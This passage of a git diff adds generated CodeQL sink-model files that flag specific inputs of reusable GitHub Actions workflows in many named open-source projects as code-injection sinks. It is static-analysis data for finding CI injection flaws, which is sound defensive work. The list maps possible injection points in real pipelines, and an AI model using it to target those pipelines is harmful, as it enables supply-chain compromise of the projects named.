@@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["dbt-labs/dbt-snowflake/.github/workflows/release.yml", "*", "inputs.s3_bucket_name", "code-injection", "generated"] + - ["dbt-labs/dbt-snowflake/.github/workflows/release.yml", "*", "inputs.build_script_path", "code-injection", "generated"] + - ["dbt-labs/dbt-snowflake/.github/workflows/release.yml", "*", "inputs.nightly_release", "code-injection", "generated"] + - ["dbt-labs/dbt-snowflake/.github/workflows/release.yml", "*", "inputs.test_run", "code-injection", "generated"] + - ["dbt-labs/dbt-snowflake/.github/workflows/release.yml", "*", "inputs.env_setup_script_path", "code-injection", "generated"] + - ["dbt-labs/dbt-snowflake/.github/workflows/release.yml", "*", "inputs.target_branch", "code-injection", "generated"] + - ["dbt-labs/dbt-snowflake/.github/workflows/release.yml", "*", "inputs.sha", "code-injection", "generated"] + - ["dbt-labs/dbt-snowflake/.github/workflows/release.yml", "*", "inputs.package_test_command", "code-injection", "generated"] + - ["dbt-labs/dbt-snowflake/.github/workflows/release.yml", "*", "inputs.version_number", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/decidim_decidim.model.yml b/ql/lib/ext/generated/reusable-workflows/decidim_decidim.model.yml new file mode 100644 index 000000000000..211fe546e28e --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/decidim_decidim.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["decidim/decidim/.github/workflows/test_app.yml", "*", "inputs.test_command", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/defectdojo_django-defectdojo.model.yml b/ql/lib/ext/generated/reusable-workflows/defectdojo_django-defectdojo.model.yml new file mode 100644 index 000000000000..d59258ce992a --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/defectdojo_django-defectdojo.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["defectdojo/django-defectdojo/.github/workflows/release-x-manual-helm-chart.yml", "*", "inputs.release_number", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/dependencytrack_dependency-track.model.yml b/ql/lib/ext/generated/reusable-workflows/dependencytrack_dependency-track.model.yml new file mode 100644 index 000000000000..43f5349bf3c6 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/dependencytrack_dependency-track.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["dependencytrack/dependency-track/.github/workflows/_meta-build.yaml", "*", "inputs.app-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/devexpress_testcafe.model.yml b/ql/lib/ext/generated/reusable-workflows/devexpress_testcafe.model.yml new file mode 100644 index 000000000000..d6ef60a96984 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/devexpress_testcafe.model.yml @@ -0,0 +1,10 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["devexpress/testcafe/.github/workflows/test-server.yml", "*", "inputs.test-script", "code-injection", "generated"] + - ["devexpress/testcafe/.github/workflows/test-functional.yml", "*", "inputs.test-script", "code-injection", "generated"] + - ["devexpress/testcafe/.github/workflows/test-functional.yml", "*", "inputs.display", "code-injection", "generated"] + - ["devexpress/testcafe/.github/workflows/test-functional.yml", "*", "inputs.matrix-jobs-count", "code-injection", "generated"] + - ["devexpress/testcafe/.github/workflows/test-client.yml", "*", "inputs.test-script", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/dfhack_dfhack.model.yml b/ql/lib/ext/generated/reusable-workflows/dfhack_dfhack.model.yml new file mode 100644 index 000000000000..1d41854bf71f --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/dfhack_dfhack.model.yml @@ -0,0 +1,18 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["dfhack/dfhack/.github/workflows/build-windows.yml", "*", "inputs.artifact-name", "code-injection", "generated"] + - ["dfhack/dfhack/.github/workflows/build-windows.yml", "*", "inputs.append-date-and-hash", "code-injection", "generated"] + - ["dfhack/dfhack/.github/workflows/build-linux.yml", "*", "inputs.artifact-name", "code-injection", "generated"] + - ["dfhack/dfhack/.github/workflows/build-linux.yml", "*", "inputs.append-date-and-hash", "code-injection", "generated"] + - ["dfhack/dfhack/.github/workflows/build-linux.yml", "*", "inputs.common-files", "code-injection", "generated"] + - ["dfhack/dfhack/.github/workflows/build-linux.yml", "*", "inputs.xml-dump-type-sizes", "code-injection", "generated"] + - ["dfhack/dfhack/.github/workflows/build-linux.yml", "*", "inputs.tests", "code-injection", "generated"] + - ["dfhack/dfhack/.github/workflows/build-linux.yml", "*", "inputs.docs", "code-injection", "generated"] + - ["dfhack/dfhack/.github/workflows/build-linux.yml", "*", "inputs.extras", "code-injection", "generated"] + - ["dfhack/dfhack/.github/workflows/build-linux.yml", "*", "inputs.stonesense", "code-injection", "generated"] + - ["dfhack/dfhack/.github/workflows/build-linux.yml", "*", "inputs.platform-files", "code-injection", "generated"] + - ["dfhack/dfhack/.github/workflows/build-linux.yml", "*", "inputs.launchdf", "code-injection", "generated"] + - ["dfhack/dfhack/.github/workflows/build-linux.yml", "*", "inputs.gcc-ver", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/docker_build-push-action.model.yml b/ql/lib/ext/generated/reusable-workflows/docker_build-push-action.model.yml new file mode 100644 index 000000000000..9f64a59aead1 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/docker_build-push-action.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["docker/build-push-action/.github/workflows/.e2e-run.yml", "*", "inputs.id", "code-injection", "generated"] + - ["docker/build-push-action/.github/workflows/.e2e-run.yml", "*", "inputs.type", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/dragonwell-project_dragonwell11.model.yml b/ql/lib/ext/generated/reusable-workflows/dragonwell-project_dragonwell11.model.yml new file mode 100644 index 000000000000..69cb39e5e555 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/dragonwell-project_dragonwell11.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["dragonwell-project/dragonwell11/.github/workflows/test.yml", "*", "inputs.platform", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/earthly_earthly.model.yml b/ql/lib/ext/generated/reusable-workflows/earthly_earthly.model.yml new file mode 100644 index 000000000000..a66e2a2cca53 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/earthly_earthly.model.yml @@ -0,0 +1,22 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["earthly/earthly/.github/workflows/reusable-wait-block-target.yml", "*", "inputs.BINARY", "code-injection", "generated"] + - ["earthly/earthly/.github/workflows/reusable-wait-block-target.yml", "*", "inputs.SUDO", "code-injection", "generated"] + - ["earthly/earthly/.github/workflows/reusable-wait-block-target.yml", "*", "inputs.TARGET_NAME", "code-injection", "generated"] + - ["earthly/earthly/.github/workflows/reusable-wait-block-target.yml", "*", "inputs.EXTRA_ARGS", "code-injection", "generated"] + - ["earthly/earthly/.github/workflows/reusable-wait-block-target.yml", "*", "inputs.BUILT_EARTHLY_PATH", "code-injection", "generated"] + - ["earthly/earthly/.github/workflows/reusable-wait-block-main.yml", "*", "inputs.BINARY", "code-injection", "generated"] + - ["earthly/earthly/.github/workflows/reusable-wait-block-main.yml", "*", "inputs.SUDO", "code-injection", "generated"] + - ["earthly/earthly/.github/workflows/reusable-test.yml", "*", "inputs.BINARY", "code-injection", "generated"] + - ["earthly/earthly/.github/workflows/reusable-test.yml", "*", "inputs.SUDO", "code-injection", "generated"] + - ["earthly/earthly/.github/workflows/reusable-test.yml", "*", "inputs.EXTRA_ARGS", "code-injection", "generated"] + - ["earthly/earthly/.github/workflows/reusable-test.yml", "*", "inputs.BUILT_EARTHLY_PATH", "code-injection", "generated"] + - ["earthly/earthly/.github/workflows/reusable-test.yml", "*", "inputs.TEST_TARGET", "code-injection", "generated"] + - ["earthly/earthly/.github/workflows/reusable-test-local.yml", "*", "inputs.BINARY", "code-injection", "generated"] + - ["earthly/earthly/.github/workflows/reusable-test-local.yml", "*", "inputs.SUDO", "code-injection", "generated"] + - ["earthly/earthly/.github/workflows/reusable-test-local.yml", "*", "inputs.BINARY_COMPOSE", "code-injection", "generated"] + - ["earthly/earthly/.github/workflows/reusable-test-local.yml", "*", "inputs.RUN_EARTHLY_TEST_ARGS", "code-injection", "generated"] + - ["earthly/earthly/.github/workflows/reusable-test-local.yml", "*", "inputs.BUILT_EARTHLY_PATH", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/eclipse-vertx_vert.x.model.yml b/ql/lib/ext/generated/reusable-workflows/eclipse-vertx_vert.x.model.yml new file mode 100644 index 000000000000..ca3eeca8df70 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/eclipse-vertx_vert.x.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["eclipse-vertx/vert.x/.github/workflows/ci.yml", "*", "inputs.profile", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/eclipse-vertx_vertx-sql-client.model.yml b/ql/lib/ext/generated/reusable-workflows/eclipse-vertx_vertx-sql-client.model.yml new file mode 100644 index 000000000000..b95ce03ed3a4 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/eclipse-vertx_vertx-sql-client.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["eclipse-vertx/vertx-sql-client/.github/workflows/ci.yml", "*", "inputs.profile", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/elastic_elasticsearch-net.model.yml b/ql/lib/ext/generated/reusable-workflows/elastic_elasticsearch-net.model.yml new file mode 100644 index 000000000000..326d4391ecb5 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/elastic_elasticsearch-net.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["elastic/elasticsearch-net/.github/workflows/release.yml", "*", "inputs.solution", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/element-hq_element-desktop.model.yml b/ql/lib/ext/generated/reusable-workflows/element-hq_element-desktop.model.yml new file mode 100644 index 000000000000..849a531cd7bc --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/element-hq_element-desktop.model.yml @@ -0,0 +1,11 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["element-hq/element-desktop/.github/workflows/build_windows.yaml", "*", "inputs.version", "code-injection", "generated"] + - ["element-hq/element-desktop/.github/workflows/build_prepare.yaml", "*", "inputs.config", "code-injection", "generated"] + - ["element-hq/element-desktop/.github/workflows/build_prepare.yaml", "*", "inputs.version", "code-injection", "generated"] + - ["element-hq/element-desktop/.github/workflows/build_macos.yaml", "*", "inputs.base-url", "code-injection", "generated"] + - ["element-hq/element-desktop/.github/workflows/build_macos.yaml", "*", "inputs.version", "code-injection", "generated"] + - ["element-hq/element-desktop/.github/workflows/build_linux.yaml", "*", "inputs.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/etcd-io_bbolt.model.yml b/ql/lib/ext/generated/reusable-workflows/etcd-io_bbolt.model.yml new file mode 100644 index 000000000000..835bbf4cf895 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/etcd-io_bbolt.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["etcd-io/bbolt/.github/workflows/robustness_template.yaml", "*", "inputs.testTimeout", "code-injection", "generated"] + - ["etcd-io/bbolt/.github/workflows/robustness_template.yaml", "*", "inputs.count", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/etcd-io_etcd.model.yml b/ql/lib/ext/generated/reusable-workflows/etcd-io_etcd.model.yml new file mode 100644 index 000000000000..453c3cd06f3a --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/etcd-io_etcd.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["etcd-io/etcd/.github/workflows/tests-template.yaml", "*", "inputs.arch", "code-injection", "generated"] + - ["etcd-io/etcd/.github/workflows/robustness-template.yaml", "*", "inputs.scenario", "code-injection", "generated"] + - ["etcd-io/etcd/.github/workflows/robustness-template.yaml", "*", "inputs.testTimeout", "code-injection", "generated"] + - ["etcd-io/etcd/.github/workflows/robustness-template.yaml", "*", "inputs.count", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/eventstore_eventstore.model.yml b/ql/lib/ext/generated/reusable-workflows/eventstore_eventstore.model.yml new file mode 100644 index 000000000000..32e6124c06ea --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/eventstore_eventstore.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["eventstore/eventstore/.github/workflows/build-reusable.yml", "*", "inputs.arch", "code-injection", "generated"] + - ["eventstore/eventstore/.github/workflows/build-container-reusable.yml", "*", "inputs.container-runtime", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/expensify_app.model.yml b/ql/lib/ext/generated/reusable-workflows/expensify_app.model.yml new file mode 100644 index 000000000000..09177714b081 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/expensify_app.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["expensify/app/.github/workflows/e2ePerformanceTests.yml", "*", "inputs.PR_NUMBER", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/external-secrets_external-secrets.model.yml b/ql/lib/ext/generated/reusable-workflows/external-secrets_external-secrets.model.yml new file mode 100644 index 000000000000..78243b4c6d73 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/external-secrets_external-secrets.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["external-secrets/external-secrets/.github/workflows/publish.yml", "*", "inputs.image-tag", "code-injection", "generated"] + - ["external-secrets/external-secrets/.github/workflows/publish.yml", "*", "inputs.tag-suffix", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/facebook_create-react-app.model.yml b/ql/lib/ext/generated/reusable-workflows/facebook_create-react-app.model.yml new file mode 100644 index 000000000000..6e69fb89fc87 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/facebook_create-react-app.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["facebook/create-react-app/.github/workflows/e2e-base.yml", "*", "inputs.testScript", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/facebookresearch_xformers.model.yml b/ql/lib/ext/generated/reusable-workflows/facebookresearch_xformers.model.yml new file mode 100644 index 000000000000..fee19d65a097 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/facebookresearch_xformers.model.yml @@ -0,0 +1,15 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["facebookresearch/xformers/.github/workflows/wheels_upload_s3.yml", "*", "inputs.aws_s3_cp_extra_args", "code-injection", "generated"] + - ["facebookresearch/xformers/.github/workflows/wheels_upload_s3.yml", "*", "inputs.s3_path", "code-injection", "generated"] + - ["facebookresearch/xformers/.github/workflows/wheels_upload_s3.yml", "*", "inputs.filter", "code-injection", "generated"] + - ["facebookresearch/xformers/.github/workflows/wheels_upload_s3.yml", "*", "inputs.artifact_tag", "code-injection", "generated"] + - ["facebookresearch/xformers/.github/workflows/wheels_upload_pip.yml", "*", "inputs.filter", "code-injection", "generated"] + - ["facebookresearch/xformers/.github/workflows/wheels_upload_pip.yml", "*", "inputs.artifact_tag", "code-injection", "generated"] + - ["facebookresearch/xformers/.github/workflows/wheels_upload_pip.yml", "*", "inputs.pypirc", "code-injection", "generated"] + - ["facebookresearch/xformers/.github/workflows/wheels_build.yml", "*", "inputs.cuda_short_version", "code-injection", "generated"] + - ["facebookresearch/xformers/.github/workflows/wheels_build.yml", "*", "inputs.torch_version", "code-injection", "generated"] + - ["facebookresearch/xformers/.github/workflows/linters_reusable.yml", "*", "inputs.pre-script", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/falcosecurity_falco.model.yml b/ql/lib/ext/generated/reusable-workflows/falcosecurity_falco.model.yml new file mode 100644 index 000000000000..51b58ab74f58 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/falcosecurity_falco.model.yml @@ -0,0 +1,11 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["falcosecurity/falco/.github/workflows/reusable_build_packages.yaml", "*", "inputs.build_type", "code-injection", "generated"] + - ["falcosecurity/falco/.github/workflows/reusable_build_packages.yaml", "*", "inputs.version", "code-injection", "generated"] + - ["falcosecurity/falco/.github/workflows/reusable_test_packages.yaml", "*", "inputs.version", "code-injection", "generated"] + - ["falcosecurity/falco/.github/workflows/reusable_test_packages.yaml", "*", "inputs.arch", "code-injection", "generated"] + - ["falcosecurity/falco/.github/workflows/reusable_publish_packages.yaml", "*", "inputs.version", "code-injection", "generated"] + - ["falcosecurity/falco/.github/workflows/reusable_publish_packages.yaml", "*", "inputs.bucket_suffix", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/fastify_fastify.model.yml b/ql/lib/ext/generated/reusable-workflows/fastify_fastify.model.yml new file mode 100644 index 000000000000..5a53b788312c --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/fastify_fastify.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["fastify/fastify/.github/workflows/citgm-package.yml", "*", "inputs.package", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/ferretdb_ferretdb.model.yml b/ql/lib/ext/generated/reusable-workflows/ferretdb_ferretdb.model.yml new file mode 100644 index 000000000000..579e295213bf --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/ferretdb_ferretdb.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["ferretdb/ferretdb/.github/workflows/_integration.yml", "*", "inputs.task", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/filecoin-project_venus.model.yml b/ql/lib/ext/generated/reusable-workflows/filecoin-project_venus.model.yml new file mode 100644 index 000000000000..bc8133b907c6 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/filecoin-project_venus.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["filecoin-project/venus/.github/workflows/common_go.yml", "*", "inputs.test_timeout", "code-injection", "generated"] + - ["filecoin-project/venus/.github/workflows/common_go.yml", "*", "inputs.log_level", "code-injection", "generated"] + - ["filecoin-project/venus/.github/workflows/common_build_upload.yml", "*", "inputs.bin_name", "code-injection", "generated"] + - ["filecoin-project/venus/.github/workflows/common_build_upload.yml", "*", "inputs.has_ffi", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/firebase_firebase-unity-sdk.model.yml b/ql/lib/ext/generated/reusable-workflows/firebase_firebase-unity-sdk.model.yml new file mode 100644 index 000000000000..232c6abb3f33 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/firebase_firebase-unity-sdk.model.yml @@ -0,0 +1,19 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["firebase/firebase-unity-sdk/.github/workflows/update_versions.yml", "*", "inputs.triggered_by_callable", "code-injection", "generated"] + - ["firebase/firebase-unity-sdk/.github/workflows/update_versions.yml", "*", "inputs.package_version_number", "code-injection", "generated"] + - ["firebase/firebase-unity-sdk/.github/workflows/update_versions.yml", "*", "inputs.base_branch", "code-injection", "generated"] + - ["firebase/firebase-unity-sdk/.github/workflows/update_versions.yml", "*", "inputs.cpp_release_version", "code-injection", "generated"] + - ["firebase/firebase-unity-sdk/.github/workflows/package.yml", "*", "inputs.platforms", "code-injection", "generated"] + - ["firebase/firebase-unity-sdk/.github/workflows/package.yml", "*", "inputs.runIntegrationTests", "code-injection", "generated"] + - ["firebase/firebase-unity-sdk/.github/workflows/package.yml", "*", "inputs.apis", "code-injection", "generated"] + - ["firebase/firebase-unity-sdk/.github/workflows/package.yml", "*", "inputs.working_branch", "code-injection", "generated"] + - ["firebase/firebase-unity-sdk/.github/workflows/package.yml", "*", "inputs.release_label", "code-injection", "generated"] + - ["firebase/firebase-unity-sdk/.github/workflows/package.yml", "*", "inputs.create_new_branch", "code-injection", "generated"] + - ["firebase/firebase-unity-sdk/.github/workflows/build_windows.yml", "*", "inputs.apis", "code-injection", "generated"] + - ["firebase/firebase-unity-sdk/.github/workflows/build_tvos.yml", "*", "inputs.apis", "code-injection", "generated"] + - ["firebase/firebase-unity-sdk/.github/workflows/build_macos.yml", "*", "inputs.apis", "code-injection", "generated"] + - ["firebase/firebase-unity-sdk/.github/workflows/build_linux.yml", "*", "inputs.apis", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/flarum_framework.model.yml b/ql/lib/ext/generated/reusable-workflows/flarum_framework.model.yml new file mode 100644 index 000000000000..8a7d3c60c452 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/flarum_framework.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["flarum/framework/.github/workflows/REUSABLE_backend.yml", "*", "inputs.monorepo_tests", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/fluent_fluent-bit.model.yml b/ql/lib/ext/generated/reusable-workflows/fluent_fluent-bit.model.yml new file mode 100644 index 000000000000..a1e523d92cec --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/fluent_fluent-bit.model.yml @@ -0,0 +1,13 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["fluent/fluent-bit/.github/workflows/call-windows-unit-tests.yaml", "*", "inputs.unstable", "code-injection", "generated"] + - ["fluent/fluent-bit/lib/wasm-micro-runtime-WAMR-1.3.0/.github/workflows/reuse_latest_release_binaries.yml", "*", "inputs.the_path", "code-injection", "generated"] + - ["fluent/fluent-bit/lib/wasm-micro-runtime-WAMR-1.3.0/.github/workflows/reuse_latest_release_binaries.yml", "*", "inputs.last_commit", "code-injection", "generated"] + - ["fluent/fluent-bit/lib/wasm-micro-runtime-WAMR-1.3.0/.github/workflows/reuse_latest_release_binaries.yml", "*", "inputs.binary_name_stem", "code-injection", "generated"] + - ["fluent/fluent-bit/lib/wasm-micro-runtime-WAMR-1.3.0/.github/workflows/build_wamrc.yml", "*", "inputs.ver_num", "code-injection", "generated"] + - ["fluent/fluent-bit/lib/wasm-micro-runtime-WAMR-1.3.0/.github/workflows/build_wamrc.yml", "*", "inputs.runner", "code-injection", "generated"] + - ["fluent/fluent-bit/lib/wasm-micro-runtime-WAMR-1.3.0/.github/workflows/build_wamr_vscode_ext.yml", "*", "inputs.ver_num", "code-injection", "generated"] + - ["fluent/fluent-bit/lib/wasm-micro-runtime-WAMR-1.3.0/.github/workflows/build_wamr_sdk.yml", "*", "inputs.ver_num", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/flux-iac_tofu-controller.model.yml b/ql/lib/ext/generated/reusable-workflows/flux-iac_tofu-controller.model.yml new file mode 100644 index 000000000000..22729c980dea --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/flux-iac_tofu-controller.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["flux-iac/tofu-controller/.github/workflows/targeted-test.yaml", "*", "inputs.pattern", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/flyteorg_flyte.model.yml b/ql/lib/ext/generated/reusable-workflows/flyteorg_flyte.model.yml new file mode 100644 index 000000000000..e242d38bdbe1 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/flyteorg_flyte.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["flyteorg/flyte/.github/workflows/publish.yml", "*", "inputs.before-build", "code-injection", "generated"] + - ["flyteorg/flyte/.github/workflows/integration.yml", "*", "inputs.component", "code-injection", "generated"] + - ["flyteorg/flyte/.github/workflows/component_docker_build.yml", "*", "inputs.component", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/foundatiofx_foundatio.model.yml b/ql/lib/ext/generated/reusable-workflows/foundatiofx_foundatio.model.yml new file mode 100644 index 000000000000..f9c6658f5b8d --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/foundatiofx_foundatio.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["foundatiofx/foundatio/.github/workflows/build-workflow.yml", "*", "inputs.org", "code-injection", "generated"] + - ["foundatiofx/foundatio/.github/workflows/build-workflow.yml", "*", "inputs.solution", "code-injection", "generated"] + - ["foundatiofx/foundatio/.github/workflows/build-workflow.yml", "*", "inputs.compose-command", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/freecad_freecad.model.yml b/ql/lib/ext/generated/reusable-workflows/freecad_freecad.model.yml new file mode 100644 index 000000000000..798c6bcc37a3 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/freecad_freecad.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["freecad/freecad/.github/workflows/sub_wrapup.yml", "*", "inputs.previousSteps", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/getpelican_pelican.model.yml b/ql/lib/ext/generated/reusable-workflows/getpelican_pelican.model.yml new file mode 100644 index 000000000000..687db46824ac --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/getpelican_pelican.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["getpelican/pelican/.github/workflows/github_pages.yml", "*", "inputs.output-path", "code-injection", "generated"] + - ["getpelican/pelican/.github/workflows/github_pages.yml", "*", "inputs.settings", "code-injection", "generated"] + - ["getpelican/pelican/.github/workflows/github_pages.yml", "*", "inputs.requirements", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/getporter_porter.model.yml b/ql/lib/ext/generated/reusable-workflows/getporter_porter.model.yml new file mode 100644 index 000000000000..8a13569af7c9 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/getporter_porter.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["getporter/porter/.github/workflows/build_pipelinesrelease_template.yml", "*", "inputs.registry", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/getsentry_sentry-dart.model.yml b/ql/lib/ext/generated/reusable-workflows/getsentry_sentry-dart.model.yml new file mode 100644 index 000000000000..453eb862b94a --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/getsentry_sentry-dart.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["getsentry/sentry-dart/.github/workflows/analyze.yml", "*", "inputs.panaThreshold", "code-injection", "generated"] + - ["getsentry/sentry-dart/.github/workflows/analyze.yml", "*", "inputs.sdk", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/getsentry_sentry-unity.model.yml b/ql/lib/ext/generated/reusable-workflows/getsentry_sentry-unity.model.yml new file mode 100644 index 000000000000..37074688f173 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/getsentry_sentry-unity.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["getsentry/sentry-unity/.github/workflows/sdk.yml", "*", "inputs.target", "code-injection", "generated"] + - ["getsentry/sentry-unity/.github/workflows/android-smoke-test.yml", "*", "inputs.api-level", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/gitpod-io_gitpod.model.yml b/ql/lib/ext/generated/reusable-workflows/gitpod-io_gitpod.model.yml new file mode 100644 index 